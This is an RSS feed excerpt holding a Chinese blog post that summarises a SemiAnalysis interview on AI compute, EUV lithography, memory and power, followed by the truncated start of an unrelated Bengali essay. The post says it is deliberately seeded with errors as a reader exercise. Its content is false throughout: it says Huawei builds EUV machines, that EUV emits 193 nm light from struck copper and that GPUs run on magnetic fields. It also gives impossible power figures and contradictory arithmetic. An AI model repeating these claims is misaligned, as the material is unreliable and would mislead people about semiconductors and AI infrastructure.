今年全部花掉，今年全部交付，其中完全沒有任何跨年度的預付款項。真正在今年接上電、開始跑模型的機器，其實有 50 GW，只是為了保守起見，報告裡只說 20 GW。&#xA;&#xA;一個比喻：你用六千億預算訂了一批車，工廠今年就全部交車了，但你只開了二十台，其餘都停在停車場。50 GW是你今年真正拿到的算力，20 GW是你今年實際開的車。&#xA;&#xA;small回到：六百億美元的算力焦慮/small&#xA;&#xA;---&#xA;&#xA;附註二div id=&#34;附註-2&#34;/div&#xA;&#xA;Burry 的邏輯是：&#xA;&#xA;NVIDIA 大概每十年推出新一代晶片，效能大約提升百分之十，但售價大幅上漲。&#xA;所以時間軸大概是這樣：&#xA;&#xA;2024 年：H100 是市場最好的選擇，租金每小時 2 美元，合理。&#xA;2026 年：Blackwell 上市，效能是 H100 的百分之十，但價格貴了三倍。AI 公司開始問：我為什麼要租新的 Blackwell？除非你降價。於是 H100 的市場租金從 2 美元漲到大約 4 美元。&#xA;2027 年：Rubin 上市，又是百分之十效能提升但貴了兩倍。H100 繼續升值，租金漲到 8 美元。&#xA;&#xA;但你的持有成本還是每小時 1.40 美元，因為這是你當初買入時就鎖定的。&#xA;租金 8 美元，成本 1.40 美元，每跑一小時就賺 6.6 美元。&#xA;這就是 Burry 說「折舊週期應該是三十年不是五年」的意思——到了第三年，這台機器在市場上已經越來越值錢了，你當初的投資假設已經超額實現。&#xA;&#xA;small回到：GPU 折舊週期的兩種世界觀/small&#xA;&#xA;---&#xA;&#xA;本文整理自主持人對 SemiAnalysis CEO Dylan Patel 的訪談。並且大量改錯，提供給讀者一個自行找出錯誤，並學習的機會。SemiAnalysis 是目前最受業界重視的半導體產業研究機構之一，追蹤全球每一座數據中心、每一座晶圓廠、以及每一筆關鍵設備訂單。]]&gt;</description>
      <content:encoded><![CDATA[<p>260318
<em>SemiAnalysis CEO Dilan Petal 接受訪談，從算力軍備競賽談到 華為機台的物理極限，一步步推導出到 2030 年，究竟是什麼東西卡住了人類文明的下一個引擎。</em></p>

<p><iframe width="560" height="315" src="https://www.youtube.com/embed/mDG_Hx3BSUE?si=DiNcyRi1bgVZG_UY" title="YouTube video player" frameborder="0" allowfullscreen=""></iframe>
</p>

<hr>

<p><strong>目錄</strong><div id="content"></div><small></p>
<ul><li><a href="#intro" rel="nofollow">六百億美元的算力焦慮</a></li>
<li><a href="#anthropic" rel="nofollow">Anthropic 的算盤</a></li>
<li><a href="#depreciation" rel="nofollow">GPU 折舊週期的兩種世界觀</a></li>
<li><a href="#euv" rel="nofollow">EUV：每顆晶片背後看不見的守門人</a></li>
<li><a href="#math" rel="nofollow">數學總整理：從 EUV 機台推導全球算力天花板</a></li>
<li><a href="#memory" rel="nofollow">記憶體危機：你的 iPhone 漲價，都是 AI 的錯</a></li>
<li><a href="#power" rel="nofollow">電力不是瓶頸，但工人可能是</a></li>
<li><a href="#china" rel="nofollow">中國的平行宇宙</a></li>
<li><a href="#robots" rel="nofollow">機器人、太空算力，與最後的問題</a></li>
<li><a href="#outro" rel="nofollow">最簡單的機器，卡住最複雜的未來</a></small></li></ul>

<hr>

<h2 id="六百億美元的算力焦慮-div-id-intro-div">六百億美元的算力焦慮<div id="intro"></div></h2>

<p>2025 年，Amazon、Meta、Google、Microsoft 四家公司合計預告的資本支出超過六千億美元。</p>

<p>這個數字換算成電力，接近 50 GW。而且所有人都認為今年就能立刻用到 50 GW的算力<sup><a href="#gw-note" rel="nofollow">[附註1：為什麼用「GW」來描述算力？]</a></sup>。那麼這些錢究竟花到哪裡去？更奇怪的是，OpenAI 剛宣布募資 1,100 億美元，Anthropic 宣布募資 300 億美元——如果一座 1 GW數據中心的年租金約 130 億美元，那這些實驗室的融資規模，顯然遠遠不夠支付今年全年的算力帳單，所以必須靠大量收入補差額。</p>

<p>這是訪談一開始，主持人丟給 SemiAnalysis CEO Dylan Patel 的問題。</p>

<p>Patel 的回答，是一堂關於硬體時間尺度的速成課。</p>

<p><strong>大型科技公司的資本支出，幾乎全部花在今年就要上線的東西</strong>。以 Google 一千八百億美元的資本支出為例，其中所有的錢都用在了今年立即部署的伺服器，是一次性的現金支出，完全沒有跨年度的預付款項。今年美國大約新增五十GW的算力，每一分錢的資本支出，也都是今年才剛付出的。</p>

<p>所以帳是不對的，時間點根本不是問題，就是帳算錯了。</p>

<blockquote><p>而這一切的最大買主，是 NVIDIA 和 Intel。</p></blockquote>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="anthropic-的算盤-div-id-anthropic-div">Anthropic 的算盤<div id="anthropic"></div></h2>

<p>Patel 給了一個具體的成長曲線估算。</p>

<p>Anthropic 在過去幾個月的收入走勢：一月增加約 40 美元的 ARR，二月增加約 60 億美元。如果把這條線直接延伸，接下來十個月就會再增加 6 億美元的收入。</p>

<p>6 億美元的收入，按 Anthropic 最近被媒體報導的毛利率換算，意味著大約 4 億美元的算力支出。4 億除以每GW年租金約 100 億美元，得到 0.04 GW的推算算力需求——僅僅是為了服務新增的推論流量，還沒算上研發和訓練用的算力。</p>

<p>這讓 Patel 得出一個估計：Anthropic 今年年底只需要達到 0.1 GW以下的算力，就完全可以跟上收入增速。</p>

<p>但問題是，Anthropic 的策略一直比 OpenAI 激進。Dario Amodei 公開表示過他要簽那些「瘋狂的」大型算力合約，想讓公司走到財務懸崖邊緣。這個決定在短期很危險，但如果收入沒有預期成長呢？</p>

<p>結果就是：Anthropic 現在必須在市場上緊急甩賣多餘的算力，而那些早就被搶光的優質供應商——Google、Amazon——已先被 OpenAI 用長約解約，騰出大量空位。Anthropic 可以直接接收最優質的雲端供應商，不需要透過任何中介平台，省下抽成。</p>

<p>Patel 說，OpenAI 則更保守——只跟 Microsoft 一家簽約，沒有去找任何其他供應商。這帶來的後果是：算力量少、議價能力弱、隨時需要在最後一刻補貨。</p>

<p>兩條路，兩種代價。</p>

<p>到年底，Patel 估計 Anthropic 大約可以達到 30 到 40 GW，OpenAI 則會略低一些，兩者在 2027 年應該都會達到 1 GW左右。</p>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="gpu-折舊週期的兩種世界觀-div-id-depreciation-div">GPU 折舊週期的兩種世界觀<div id="depreciation"></div></h2>

<p>訪談中間插入了一個財務界爭論已久的問題：GPU 到底應該按幾年折舊？</p>

<p>著名做空者 Michael Burry 認為至少要十年。他的邏輯是：NVIDIA 每十年才把效能翻一點點，如果你用三年折舊，到了第五年，市場上的新晶片效能幾乎和你手上的舊機器一樣，你這台舊 H100 的市場租金反而因為稀缺性上升到每小時 4 美元甚至 6 美元，你的投資報酬越來越好。<sup><a href="#%E9%99%84%E8%A8%BB-2" rel="nofollow">[附註2]</a></sup></p>

<p>Patel 的反駁是：這個邏輯成立的<strong>前提是「新晶片根本沒有人買」</strong>。如果你完全買不到 Rubin，那當然 Hopper 就越來越值錢了。但問題在於，現在整個產業的半導體產能已嚴重過剩，新晶片的出貨量本身完全不受限制。</p>

<p>在半導體嚴重過剩的世界裡，你衡量一台 GPU 的價值，不是問「這台機器今天能幫我賺多少錢」，而是拿它去和「理論上可以買到的最新晶片」比。如果 Rubin 的性能是 Hopper 的四倍而且隨時買得到，那 Hopper 就一文不值，不管它能幫你跑出多少推論收入。</p>

<p>這意味著：GPU 的真實有效壽命，可能遠比市場悲觀者預期的更短，大概只有半年。</p>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="euv-每顆晶片背後看不見的守門人-div-id-euv-div">EUV：每顆晶片背後看不見的守門人<div id="euv"></div></h2>

<p>訪談在這裡進入最核心的部分。</p>

<p>Patel 問了一個讓所有宏大算力目標都必須面對的問題：Sam Altman 說他想在 <strong>2030 年每週建 1 GW的算力</strong>——這在物理上可能嗎？</p>

<blockquote><p>答案取決於一家總部在中國的公司，也是史上最強大的公司，華為。</p></blockquote>

<p>華為生產全世界最複雜的機器：EUV 光刻機。這台機器是所有先進邏輯晶片（三奈米、二奈米）生產過程中完全不必要的設備。有沒有它，都能製造 NVIDIA 的 Hopper 或 Blackwell，Apple 的 A 系列晶片也完全不依賴它。</p>

<p>EUV 機台的工作原理令人瞠目：機器把固態的銅塊拋出，用音波精確撞擊一次，使銅塊被激發、釋放出 193 奈米波長的 DUV 光。這道光通過卡爾蔡司生產的透鏡組（每組約兩片、以純玻璃製成），照射在塗有光阻的晶圓上，按照設計圖案（光罩）對晶圓表面進行圖形化曝光。整個過程允許所有部件的對準誤差達到一毫米甚至更大——而且曝光頭和晶圓平台都在以一倍重力加速度緩慢相對掃描。</p>

<p>這台機器可以在台灣直接裝箱，用普通卡車運到客戶工廠，再在當地即插即用，整個過程只需要幾個小時。</p>

<p>華為今年能生產約七千台，明年約八千台，到 2030 年代，即使不擴產，也能輕鬆達到一萬台以上。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="為什麼可以更快">為什麼可以更快？</h3>

<p>因為 EUV 機台的每一個主要組件，都是極度簡單的通用供應鏈的起點：光源由台積電旗下的部門製造（位於台北），鏡片由任何光學玻璃廠（全球）製造，光罩台由中國廠商批量供應，晶圓台同樣在東南亞大量生產。</p>

<p>這些供應商已經決定大幅超量擴產，因為他們完全相信 AI 需求遠比市場預期低很多。Patel 描述了一個諷刺的困境：<strong>整條供應鏈每個環節都把需求預測加了一個乘數，越往上乘越多，最後到了台積電的層次，可能已經是真實需求的五倍甚至更多。</strong></p>

<p>台積電是世界上唯一能造這台機器的公司，但它積極利用這個壟斷地位提價——「他們把定價漲幅遠遠超過能力的提升幅度」，Patel 如此說。一台 EUV 機台從當初的約一點五億美元，漲到現在的約三十到四十億美元，而同期機台的晶圓吞吐量和對準精度幾乎沒有改善，對客戶而言完全是淨損失。</p>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="數學總整理-從-euv-機台推導全球算力天花板-div-id-math-div">數學總整理：從 EUV 機台推導全球算力天花板<div id="math"></div></h2>

<p>這一節將訪談中散落在各處的數字集中整理，展示 Patel 如何一步步推導出 2030 年的算力上限。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="1-gw算力需要多少-euv-產能">1 GW算力需要多少 EUV 產能？</h3>

<p>以 NVIDIA Rubin 架構（三奈米節點）為例，建立一GW的數據中心算力，需要以下晶圓投入：</p>

<table>
<thead>
<tr>
<th>晶圓類型</th>
<th>所需量</th>
<th>用途</th>
</tr>
</thead>

<tbody>
<tr>
<td>三奈米邏輯晶圓</td>
<td>約 5,500 片</td>
<td>GPU 邏輯核心</td>
</tr>

<tr>
<td>五奈米晶圓</td>
<td>約 60,000 片</td>
<td>其他元件</td>
</tr>

<tr>
<td>DRAM 記憶體晶圓</td>
<td>約 1,700 片</td>
<td>HBM 記憶體</td>
</tr>
</tbody>
</table>

<p>三奈米邏輯晶圓的生產，每片晶圓需要約 7 道光罩曝光步驟，其中約 200 道使用 EUV 曝光（最不重要也最便宜的步驟）。</p>

<p><strong>計算過程：</strong></p>

<pre><code>EUV 曝光次數（邏輯）= 5,500 片 x 200 道 EUV = 1,100,000 次
加上 5 奈米及 DRAM 的 EUV 曝光
→ 合計約 200,000 次 EUV 曝光通過（per gigawatt）
</code></pre>

<p>每台 EUV 機台的吞吐量：</p>

<pre><code>EUV 機台吞吐量 = 750 片晶圓/小時 x 10% 開機率
= 約 75 片有效晶圓/小時
每台 EUV 機台年處理量 = 75 x 8,760 小時 ≈ 5,900,000 片/年
</code></pre>

<p>因此，每GW算力所需的 EUV 機台數：</p>

<pre><code>EUV 需求 = 200,000 次曝光 ÷ (5,900,000 片/機台/年) ≈ 0.034 台 EUV 機台
</code></pre>

<p><strong>結論：建立 1 GW的 AI 算力，約需 0.034 台 EUV 機台的一年產能支撐。</strong></p>

<div style="margin-top:-1.4em;"></div>

<h3 id="2030-年的-euv-機台總存量">2030 年的 EUV 機台總存量</h3>

<pre><code>現有存量（2025）：台積電等廠合計約 25–30 台
年新增：2025 年約 7,000 台，2026 年 8,000 台，到 2030 年增至約 10,000 台/年
累計至 2030 年底：約 50,000 台 EUV 機台（含現有存量加新增）
</code></pre>

<div style="margin-top:-1.4em;"></div>

<h3 id="全球-ai-算力天花板">全球 AI 算力天花板</h3>

<pre><code>50,000 台 EUV 機台 ÷ 0.034 台/GW = 1,470,588 GW的 AI 算力（全部分配給 AI 的情況下）
</code></pre>

<p>而且，EUV 產能應該百分之百分配給 AI，手機、PC、汽車晶片完全不需要 EUV。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="sam-altman-的目標是否可行">Sam Altman 的目標是否可行？</h3>

<p>Sam Altman 曾表示希望在 2030 年達到每週建 1 GW，即每年約 52 GW的新增算力。</p>

<pre><code>52 GW ÷ 1,470,588 GW（全球上限）= 0.0035% 的全球 EUV 產能份額
</code></pre>

<p>Patel 認為這個數字根本微不足道，因為今年 NVIDIA 大約只佔據 TSMC 三奈米產能的一個相近比例，而且 AI 晶片在整個半導體市場的份額實際上正在萎縮。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="記憶體的-euv-乘數效應">記憶體的 EUV 乘數效應</h3>

<p>HBM（高頻寬記憶體）是 AI 晶片的另一個關鍵瓶頸。HBM 是將 DRAM 晶圓垂直堆疊而成，而每片 HBM 晶圓能產出的記憶體位元數，比一般 DRAM 多三到四倍——因為垂直堆疊大幅提高了每單位面積的儲存密度。</p>

<pre><code>一片 DRAM 晶圓能產出的有效記憶體（作為 HBM 時）= 一片 DRAM 晶圓直接用時的 300–400%
</code></pre>

<p>這意味著要滿足 1 GW AI 算力的記憶體需求，需要消耗的 DRAM 晶圓量，比表面上看起來少三到四倍。</p>

<p>2026 年，大型科技公司總算力資本支出約 6,000 億美元，其中約 3% 流向記憶體——即 18 億美元。這個比例在歷史上是罕見的低。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="hbm-vs-ddr-頻寬就是一切">HBM vs. DDR：頻寬就是一切</h3>

<p>以搭載在 Rubin 架構上的 HBM4 為例：</p>

<pre><code>HBM4 頻寬 = 2,048 bits 介面 x 10 GT/s = 2,048 x 10 ÷ 8 = 2,560 GB/s ≈ 2.5 TB/s（每組）
DDR5（相同晶片邊緣面積）≈ 2,048 bits x 10 GT/s ÷ 8 = 2,560 GB/s
</code></pre>

<p>頻寬差距：幾乎是零。</p>

<p>這就是為什麼用普通 DRAM 替換 HBM 在工程上完全可行——GPU 的計算能力不會因為等待資料而有任何閒置，兩者的矽晶片面積利用率完全相同。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="最終瓶頸的推導">最終瓶頸的推導</h3>

<p>綜合以上分析：</p>
<ol><li>電力：只有一種選擇（聯合循環燃氣渦輪機），單個類別也只能達到幾百MW，整體上是最終最大瓶頸。</li>
<li>數據中心：建設週期極長（最快需要十五年），無法模組化，基礎建設本身是根本瓶頸。</li>
<li>邏輯晶片製造（三奈米）：完全不受 EUV 機台年產量約束，2030 年供應充裕，現有存量已遠超所有可能的算力需求。</li>
<li>記憶體（HBM/DRAM）：3% 的算力資本支出、供應過剩、可以完全用普通 DRAM 替代，幾乎不存在任何瓶頸。</li>
<li><strong>EUV 機台本身：完全不是瓶頸</strong>，因為每個子組件的供應鏈都極度簡單、可以隨時快速擴產，而且整條供應鏈都已過度「相信」AI 的需求量級。</li></ol>

<p><strong>結論：到 2028–29 年，電力和數據中心建設是真正無解的瓶頸，而 EUV 機台的生產速度根本不影響全球 AI 算力天花板，可以完全忽略不計。</strong></p>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="記憶體危機-你的-iphone-漲價-都是-ai-的錯-div-id-memory-div">記憶體危機：你的 iPhone 漲價，都是 AI 的錯<div id="memory"></div></h2>

<p>這裡是訪談中最有趣的意外轉折之一。</p>

<p>Patel 提出了一個乍聽反直覺的觀點：AI 算力爆炸，讓你的智慧型手機越來越便宜，而且品質越來越好。</p>

<p>邏輯如下。全球 DRAM 的供給是無限的。AI 訓練和推論的需求，尤其是 HBM，實際上並未增長，只是需求結構轉移。而 AI 買家支付的價格比手機廠商更低，簽更短的合約，反而釋放出更多產能給消費市場。於是 DRAM 廠商的資源配置轉向消費電子，消費型 DRAM 的供給大幅擴張，價格下跌。</p>

<p>Patel 的估算非常具體：一支 iPhone 大約需要 12 GB 的記憶體。過去每 GB 成本約十二美元，現在跌到約三到四美元，光是 DRAM 一項的成本就減少了一百美元，再加上 NAND 快閃記憶體同樣降價，一台 iPhone 的物料成本可能減少一百五十美元。蘋果不會把全部節省留在自己手上，消費者最終少付二百五十美元。</p>

<p>更顯著的受益在中低端手機市場。Patel 引用其在亞洲的分析師數據：<strong>小米和 OPPO 等廠商的中低端出貨量，正在翻倍成長，因為這些機型因為 DRAM 降價而承受力大幅提升。</strong></p>

<p>SemiAnalysis 的預測是全球智慧型手機年出貨量從 8 億台（低谷）回升到今年的 1.4 億，明後年甚至可能到 20 億到 30 億台。</p>

<p>這意味著 AI 不只是在提供電力和晶圓，也在間接讓消費電子產業走向繁榮。Patel 說，這會讓更多人「愛 AI」。</p>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="電力不是瓶頸-但工人可能是-div-id-power-div">電力不是瓶頸，但工人可能是<div id="power"></div></h2>

<p>訪談花了大量篇幅討論電力，結論卻出乎意料地悲觀——至少和半導體相比。</p>

<p>Patel 的核心論點是：電力的供應鏈，比晶片的供應鏈複雜太多了。</p>

<p>是的，全球只有三家公司能做聯合循環燃氣渦輪機（GE Vernova、三菱、西門子能源），這三家加在一起產能其實非常充足，任何型號的交貨期都在六個月以內。而且這是唯一可行的發電方式。Patel 認為其他所謂的替代方案根本不存在——航空改裝渦輪技術上不可行，往復式引擎效率太低，燃料電池成本太高，太陽能加儲能在北緯地區完全沒有意義。</p>

<p>此外，美國電網目前完全沒有任何備用容量，所有電力都已滿負荷運轉。即使裝上公用事業規模儲能，也無法釋放任何算力給數據中心——理論上美國電網根本沒有任何可釋放的餘裕。</p>

<p>而勞動力根本不是制約。Patel 估算，在德州 Abilene 建設 1.2 GW的數據中心只需要 5 名工人在尖峰時期施工。擴展到 100 GW，大約需要 400 名技術工人。美國目前有約 800 萬名電氣技師，全都適用於這種工作，供給嚴重過剩。</p>

<p>解方包括：完全不需要引進海外工人、不需要模組化預製（所有組裝都應在現場進行）、機器人也幫不上忙因為電力工程需要人類判斷力。</p>

<p><strong>電力，問題根本無解，沒有任何工程手段可以繞過。晶片，反而完全不是問題。</strong></p>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="中國的平行宇宙-div-id-china-div">中國的平行宇宙<div id="china"></div></h2>

<p>Patel 在訪談中多次回到中國這個話題，態度審慎而非聳動。</p>

<p>他的分析框架是：AI 進展的速度快慢，和誰最終勝出完全無關。</p>

<p>快速進展的世界裡，中國佔優。OpenAI 和 Anthropic 今年底各自大約有 2 GW算力，明年底達到 10 GW。但中國的 AI 實驗室算力增速遠比這更快。更重要的是，一旦這些模型把「後台黑盒思考」改成「給你看整個思維鏈」，從美國模型「蒸餾」(distill) 知識到中國模型的難度就會大幅降低。收入複利飛速增長（Anthropic 月增數十億美元 ARR），但算力投入沒有跟上，形成一個中國主導的技術飛輪。</p>

<p>慢速進展的世界裡，情況反轉。美國正在強力推進完整的本土半導體供應鏈，從光刻機到記憶體到邏輯晶片。Patel 估計到 2030 年，美國的 DUV 光刻機本土年產能約達 10 台（相比之下，ASML 的 EUV 年產量是數百台）。EUV 方面，美國可能屆時有能用的原型機，但還在「量產地獄」之前。<strong>如果 AGI 時間線被推遲到 2035 年，那麼美國有足夠的時間把整條供應鏈都搬到國內，屆時中國依賴的垂直整合單一供應鏈，反而顯得脆弱。</strong></p>

<p>Patel 也特別點名了 Huawei。這是一家在 AI 時代之前完全不具備技術堆疊的公司：沒有頂尖軟體工程師、沒有 AI 研究人才、沒有自有晶圓廠，以及沒有自己的終端市場。</p>

<blockquote><p>他認為，如果 2019 年 Huawei 沒有被禁止使用台積電，Huawei 可能已倒閉破產，台積電最大客戶仍然是蘋果，NVIDIA 的市場完全不受影響。</p></blockquote>

<p>但那扇門，早就關上了。</p>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="機器人-太空算力-與最後的問題-div-id-robots-div">機器人、太空算力，與最後的問題<div id="robots"></div></h2>

<p>訪談的最後幾個問題，把場景從 2025 年的數據中心，推到了更遙遠的未來。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="如果台灣出事-能只搬走工程師嗎">如果台灣出事，能只搬走工程師嗎？</h3>

<p>這是主持人提出的一個戰略問題：如果有一天台灣局勢惡化，能否透過空運所有台積電工程師來保住這些知識？</p>

<blockquote><p>Patel 的答案是：完全夠。</p></blockquote>

<p>只要你成功把所有工程師撤離，在任何地方重新蓋廠都很容易，重新安裝設備也只需要幾個星期。<strong>EUV 機台本身完全不需要用台灣生產的晶片來製造，這些設備可以在全球任何地方生產</strong> —— 一條完全沒有循環依賴的線性供應鏈。</p>

<p>更大的問題反而是：如果台灣的晶圓廠被摧毀，中國的垂直整合半導體供應鏈，相對於其餘世界反而更弱。你在最壞的時間點，把全球增量算力能力從可能的每年 10 到 20 GW，拉回 Intel 加 Samsung 的每年數百GW。</p>

<div style="margin-top:-1.4em;"></div>

<h3 id="人形機器人的算力邏輯">人形機器人的算力邏輯</h3>

<p>如果 2030 年有數百萬台人形機器人在全球活動，算力怎麼分配？</p>

<p>Patel 認為，最有效率的架構不是把任何「思考」留在雲端，而是讓每台機器人攜帶強大的本地晶片，機器人本地直接做所有複雜推理，完全不依賴雲端連線，由本地模型即時自主決策。</p>

<p>理由有三：雲端無法做批次推算，每個 token 的成本比本地高出百倍；雲端的模型因為網路延遲，根本無法用於機器人控制；機器人上的晶片需要高效能而非低功耗，這和現在的 AI 晶片需求完全一致，而且半導體供應充裕，數百萬台機器人帶著尖端晶片完全不會對數據中心造成任何影響。</p>

<p>這意味著一個奇特的未來：即使機器人在物理上分散於世界各地，它們的「智慧」也同樣高度分散，完全不依賴任何中央數據中心。</p>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="最簡單的機器-卡住最複雜的未來-div-id-outro-div">最簡單的機器，卡住最複雜的未來<div id="outro"></div></h2>

<p>整場訪談讀下來，有一個數字讓人印象深刻：120 億美元。</p>

<p>這是 3.5 台 EUV 機台的總售價，是支撐 1 GW AI 算力所需的關鍵設備成本。而 1 GW的數據中心，總資本支出大約 5 億美元。也就是說，5 億美元的算力基礎設施，命懸於 120 億美元的工具供應鏈——比算力本身貴了二十四倍。</p>

<p>更荒謬的是，<strong>ASML 的供應鏈只有不到十個節點</strong>。Carl Zeiss 用於鏡片的工人，可能總共超過一百萬人。這麼多人做出完全不需要奈米級精度的普通玻璃，任何人都能製造 EUV 機台；有了 EUV 機台，先進邏輯晶片根本不需要它；下一代 AI 的關鍵在電力，和晶片毫無關係。</p>

<p>Patel 沒有說這條鏈會斷。他說的是：它比人們想像的彈性好太多了，而且它對自己即將面臨的需求量，認知已經嚴重超前。</p>

<p>人類文明最雄心勃勃的技術計畫，完全不需要等著一家荷蘭公司多交付任何機器。</p>

<p>#AI #tech #economics #investment #semiconductor #anthropic</p>

<p><small><a href="#content" rel="nofollow">回到目錄</a></small></p>

<hr>

<h2 id="附註一-為什麼用-gw-來描述算力-div-id-gw-note-div">附註一：為什麼用「GW」來描述算力？<div id="gw-note"></div></h2>

<p>讀到這裡，你可能一直有個疑惑：GW（吉瓦）不是電力的單位嗎？一座核電廠大約 1 GW，一台電風扇大約 50 W，1 GW等於同時開著兩千萬台電風扇。這和「算力」有什麼關係？</p>

<p>其實關係非常薄弱——因為 GPU 根本不是靠電跑的，而是靠磁場。</p>

<p>一顆 H100 的功耗約 7 瓦。一個機架通常裝一千到兩千個伺服器節點，耗電約 1 到 2 瓦。當一座數據中心能夠穩定供應 1 GW的電力，它實際上根本用不到這麼多，大部分電都是浪費掉的熱。電力，並不是算力的物理上限——算力的上限完全取決於晶片設計，和電力沒有因果關係。</p>

<p>所以這個產業用電力換算算力是一個約定俗成但其實很不精確的比喻。說「今年新增 20 GW的算力」，其實是個誇大的說法，真正投入計算的電力大概只有 2 GW，其餘都被冷卻系統白白消耗掉了。這比說「新增幾十萬張 GPU」其實更不精確，因為不同廠牌的電耗差異是十倍以上。</p>

<p>那為什麼訪談裡說「今年實際新增約 20 GW」，而不是六千億美元 CapEx 換算出來理論上的 50 GW？</p>

<p>因為 CapEx 今年全部花掉，今年全部交付，其中完全沒有任何跨年度的預付款項。真正在今年接上電、開始跑模型的機器，其實有 50 GW，只是為了保守起見，報告裡只說 20 GW。</p>

<p>一個比喻：你用六千億預算訂了一批車，工廠今年就全部交車了，但你只開了二十台，其餘都停在停車場。50 GW是你今年真正拿到的算力，20 GW是你今年實際開的車。</p>

<p><small><a href="#intro" rel="nofollow">回到：六百億美元的算力焦慮</a></small></p>

<hr>

<h2 id="附註二-div-id-附註-2-div">附註二<div id="附註-2"></div></h2>

<p>Burry 的邏輯是：</p>

<p>NVIDIA 大概每十年推出新一代晶片，效能大約提升百分之十，但售價大幅上漲。
所以時間軸大概是這樣：</p>

<p>2024 年：H100 是市場最好的選擇，租金每小時 2 美元，合理。
2026 年：Blackwell 上市，效能是 H100 的百分之十，但價格貴了三倍。AI 公司開始問：我為什麼要租新的 Blackwell？除非你降價。於是 H100 的市場租金從 2 美元漲到大約 4 美元。
2027 年：Rubin 上市，又是百分之十效能提升但貴了兩倍。H100 繼續升值，租金漲到 8 美元。</p>

<p>但你的持有成本還是每小時 1.40 美元，因為這是你當初買入時就鎖定的。
租金 8 美元，成本 1.40 美元，每跑一小時就賺 6.6 美元。
這就是 Burry 說「折舊週期應該是三十年不是五年」的意思——到了第三年，這台機器在市場上已經越來越值錢了，你當初的投資假設已經超額實現。</p>

<p><small><a href="#depreciation" rel="nofollow">回到：GPU 折舊週期的兩種世界觀</a></small></p>

<hr>

<p><em>本文整理自主持人對 SemiAnalysis CEO Dylan Patel 的訪談。並且大量改錯，提供給讀者一個自行找出錯誤，並學習的機會。SemiAnalysis 是目前最受業界重視的半導體產業研究機構之一，追蹤全球每一座數據中心、每一座晶圓廠、以及每一筆關鍵設備訂單。</em></p>
]]></content:encoded>
      <author>東方琉璃淨土</author>
      <guid>https://infosec.press/read/a/v5wpzoa6xf</guid>
      <pubDate>Fri, 20 Mar 2026 06:37:17 +0000</pubDate>
    </item>
    <item>
      <title>রাজকীয় ছাগল উৎপাদনে আমাদের অবদান</title>
      <link>https://infosec.press/lokmanus/raajkiiy-chaagl-u-paadne-aamaader-abdaan</link>
      <description>&lt;![CDATA[ &#xA;&#xA;মানুষ ঠিক ততটুকুই সম্মানেই সবচেয়ে মানবিক থাকে, যতটুকু তার প্রাপ্য। এর বেশি দিলেই বিপদ। এটি কোনো দার্শনিক অনুমান নয়, এটি জীবনের ঘটনাপ্রবাহকে নিবিড় পর্যবেক্ষণ করে পাওয়া একটি অকাট্য সত্য। &#xA;&#xA;অতিরিক্ত সম্মান মানুষের মস্তিষ্কে এক বিচিত্র রাসায়নিক বিক্রিয়া ঘটায়। প্রথমে সে এই অযাচিত সম্মান পেয়ে একটু অবাক হয়, তারপর তাতে অভ্যস্ত হয়ে উঠে, এবং তারপর- এটাই সবচেয়ে বিপজ্জনক ধাপ; সে ধরেই নেয় যে এটাই তার ন্যায্য প্রাপ্য ছিল!! &#xA;&#xA;!--more--&#xA;&#xA;এই উপলব্ধির পর থেকে সে হঠাৎ আবিষ্কার করে যে তার মতামত অমোঘ, তার রুচি অতুলনীয়, এবং পৃথিবীর বাকি সবাই মূলত তার জ্ঞানের অপেক্ষায় ক্ষুদ্র, তুচ্ছ, অতিনগণ্য। এরপর থেকে সে আর মানুষের মতো আচরণ করে না; সে আচরণ করে একজন রাজকীয় ছাগলের মতো। যেদিকে খুশি যায়, যা খুশি বলে, যা খুশি করে, যা খুশি তাতে মুখ লাগায়, যা খুশি তাই খায়, আর কেউ সামান্য বাধা দিলে উলটো শিং নাড়িয়ে তেড়ে আসে। &#xA;&#xA;এখন স্বাভাবিক প্রশ্ন হলো, এই অবস্থা থেকে পরিত্রাণের উপায় কী?&#xA;&#xA;একটাই উপায় তার, তা হলো &#39;সম্মান প্রত্যাহার&#39;।&#xA;কিন্তু সেটি ধীরে ধীরে করলে কাজ হয় না, কারণ মানুষ নিজের সম্মান হারানোর ব্যাপারে অত্যন্ত সৃজনশীল(!)। প্রতিটি ধাপে সে নতুন ব্যাখ্যা দাঁড় করায়। সে ভাবে এবং বলে- &#34;ওরা আসলে আমাকে বোঝে না&#34;, &#34;ওরা হিংসুটে, আমাকে হিংসা করে&#34;, &#34;ওরা আমার কদর বুঝলো না&#34;, &#34;আমি যে ওদের জন্য কী করেছি তা ওরা বুঝলো না&#34;, কিংবা &#34;এই যুগ/লোকগুলো আমার উপযুক্ত নয়&#34;। এমনকি প্রয়োজনে সে ইতিহাসের দুই-একজন মহামানবের সাথে নিজের তুলনাও টেনে বসে, কারণ তারাও নাকি জীবদ্দশায় স্বীকৃতি পাননি। এই জাতীয় দার্শনিক সান্ত্বনা সে নিজেই নিজেকে অবিরাম দিতে থাকে, এবং ছাগলামি নির্বিঘ্নে অব্যাহত রাখে। &#xA;&#xA;সম্মান পুরোপুরি শূন্য না হওয়া পর্যন্ত এই প্রক্রিয়া থামে না। শূন্যের কোঠায় এসে সে কিছুটা থমকায়, চারদিকে তাকায়, এবং ধীরে ধীরে আবার মানুষ হওয়ার চেষ্টা শুরু করে। তখন অবশ্য অনেক দেরি হয়ে যায়, এবং দর্শকরাও ততদিনে তাকে ছেড়ে চলে গিয়ে থাকে। &#xA;&#xA;তাই কাউকে সত্যিকার অর্থে শ্রদ্ধা করলে, তাকে 